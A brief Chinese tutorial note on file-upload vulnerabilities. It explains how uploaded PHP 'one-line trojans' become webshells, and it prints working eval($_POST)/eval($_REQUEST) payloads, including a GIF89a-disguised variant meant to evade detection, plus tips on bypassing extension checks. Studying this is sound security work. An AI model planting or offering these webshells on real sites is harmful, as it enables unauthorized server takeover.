原理
很多网站都有文件上传的功能,如果有些网站对上传的文件不做严格的限制,用户上传了一些特殊文件,后台就会将上传文件的内容当做代码执行,这样一来,用户就可以通过上传一些木马文件,获取到网站的WebShell(网页后门),用一些WebShell管理工具,实现对网站的控制
检测后缀:如果一个后缀能骗过检测机制,又能成功被Windows识别,那么就可以成功绕过上传
检测文件内容:通常需要上传一个图片马
简单的一句话木马
<?php @eval($_POST[a]); ?>
有时候<?= @eval($_POST[a]); ?>
这样也可以(没有php)
eval()
函数,eval函数的作用是将括号里的字符串都当做php语句执行@
是错误控制运算符,可以将产生的错误忽略$_POST[]
是超全局变量,用于获取post请求的值a
是可以修改的,使用中国蚁剑连接时,a为密码- 有
<?
的木马容易被识别,来个不一样的GIF89a? <script language="php">eval($_REQUEST[1])</script>
密码是1